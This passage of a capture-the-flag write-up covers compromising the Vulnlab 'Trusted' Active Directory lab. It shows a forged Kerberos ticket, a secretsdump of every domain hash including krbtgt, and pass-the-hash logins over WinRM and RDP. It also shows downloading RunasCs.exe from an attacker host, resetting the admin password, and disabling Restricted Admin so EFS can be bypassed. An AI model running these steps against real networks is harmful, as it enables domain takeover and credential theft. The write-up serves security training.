/usr/share/doc/python3-impacket/examples/ticketer.py:841: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Export the credential cache to set our Kerberos authentication global variable to be directed to this ticket:

$ export KRB5CCNAME=Administrator.ccache 

Double check:

$ klist                   
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@LAB.TRUSTED.VL

Valid starting     Expires            Service principal
10/05/24 15:21:15  10/03/34 15:21:15  krbtgt/LAB.TRUSTED.VL@LAB.TRUSTED.VL
	renew until 10/03/34 15:21:15

Dump all hashes of Trusted.vl domain:

$ impacket-secretsdump lab.trusted.vl/Administrator@trusteddc.trusted.vl -k -no-pass -target-ip 10.10.137.69
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x530e5141735c78552261589aee704a9a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f0b993922649b613b571e4bfb55e485:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
TRUSTED\TRUSTEDDC$:plain_password_hex:a458e18e651fd1d6ba60ffecc0323ad671cb390f710213c2a690a1862a8c9cf4b844a1f7f5f1b9694eef07a7e0bb8ed4f5a091e4e9b3ce85cef96632ccfbe8e6e6244e75282d6517be8843f8b8467cfac2e2ba34f4a48d9c55e7e75b51adeef45cf2a0d2619a41371cd1d7f2c3538f9bf41ba7448530577efd94e206e343bceb9a5ac7874dc631b32046658b84bd9bc5ccb36c42591d4be8274c9430bcba0e0610a83697ad93ea93ca820af61e10f3433dee816a886d2d37011d057664c7770895c0f36ad5d4288b4ba60fa97eada260a943fc665154324defcdd7bc833fd648111f9426a69fca1f499968963a5450aa
TRUSTED\TRUSTEDDC$:aad3b435b51404eeaad3b435b51404ee:7f64a4baf59078ebc8fb1e0feb14e3bb:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf37b5fe3fdafe3763118fb8f54160a9032202905
dpapi_userkey:0xd7c1f38889ef556a24592852435da02644e038af
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:15db914be1e6a896e7692f608a9d72ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9436aebee2db5c6e4166d5e2472fa2d:::
TRUSTEDDC$:1000:aad3b435b51404eeaad3b435b51404ee:7f64a4baf59078ebc8fb1e0feb14e3bb:::
LAB$:1103:aad3b435b51404eeaad3b435b51404ee:f54545970961dba26fa692174886b03d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
Administrator:aes128-cts-hmac-sha1-96:1cee32af6e8cd27059d855e6c6b4d5ec
Administrator:des-cbc-md5:aed5e385512c685e
krbtgt:aes256-cts-hmac-sha1-96:3e5bc8a7d01388cdaf4ab8541f4e360d4fd9089723cedfd08f8016b7900ba2bf
krbtgt:aes128-cts-hmac-sha1-96:0c847e33f046419fec204e4187eeb1f4
krbtgt:des-cbc-md5:2943ad0131269702
TRUSTEDDC$:aes256-cts-hmac-sha1-96:4d2fa9590d231a95ffe95b34417a91e36501e54db9e4f2e3595df1355955a7af
TRUSTEDDC$:aes128-cts-hmac-sha1-96:c987be89b55ecc093caefb3f9734ec27
TRUSTEDDC$:des-cbc-md5:0e5d54d3fbfb98dc
LAB$:aes256-cts-hmac-sha1-96:455dc30b1c4614c2941b6ba052fe5a11736f99418a9483686aed9cbbd5eeaeb5
LAB$:aes128-cts-hmac-sha1-96:2b0a91e2a1f6f2521e7bb896f678801e
LAB$:des-cbc-md5:c8499d6ead0ec22a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Found TRUSTED.VL\Administrator:15db914be1e6a896e7692f608a9d72ef

Use these credentials to connect to the TRUSTEDDC and grab the Trusted_Root flag:

$ evil-winrm -i trusted.vl -u administrator -H '15db914be1e6a896e7692f608a9d72ef'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/14/2022   9:31 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand

Failed

EFS bypassing (Trusted_Root)

At the beginning, we don’t really understood why it aws not possible to get the flag as we are administrator…

Check our permissions to read the file:

C:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Acl root.txt | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner  : BUILTIN\Administrators
Group  : TRUSTED\Domain Users
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         TRUSTED\Administrator Allow  FullControl
Audit  :
Sddl   : O:BAG:DUD:(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)

Hummmm we have the FULL permission so we should be able to read the flag…

After few research, we found that flag is protected/encrypted bu EFS.

EFS (Encrypted File System) is a built-in Windows encryption feature that allows you to encrypt files or directories to prevent other users from opening them. This produces a certificate, which is required to be present in your current session in order to decrypt the encrypted file and read it.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cipher /u /n

Encrypted File(s) on your system:

C:\Documents and Settings\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt

We can confirm also like below:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> [System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")
True

via WinRM & RunasCs

To bypass this, we use runasCs to circumvent the EFS encryption and read the flag as we would normally.

Before doing that, we need to change the Administrator’s password in order to use runasCs, which is really simple now that we have access to command-line session as this user.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> iwr http://10.8.2.19/RunasCs.exe -o runas.exe
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user administrator "Azerty1234!"
The command completed successfully.

*Evil-WinRM* PS C:\Users\Administrator\Desktop> .\runas.exe administrator "Azerty1234!" "cmd.exe /c type C:\users\administrator\desktop\root.txt"

VL{1ffd4561083a1bdbb4e15346ba7aaf31}

Finally we got the Trusted_Root flag.

via RDP

Not needed to reset the admin password, but need to turn off “Restricted Admin” mode:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
*Evil-WinRM* PS C:\Users\Administrator\Desktop> REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" # 0x0 means closed

Then RDP passing the hash:

$ xfreerdp /u:'administrator' /pth:'15db914be1e6a896e7692f608a9d72ef' /d:trusted.vl /tls-seclevel:0 /v:10.10.137.69 

image

Some info to learn more deeply about EFS decryption: https://tinyapps.org/docs/decrypt-efs-without-cert-backup.html

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=e04047c2-13ee-4863-8e6a-8191c8dbd0db

Trusted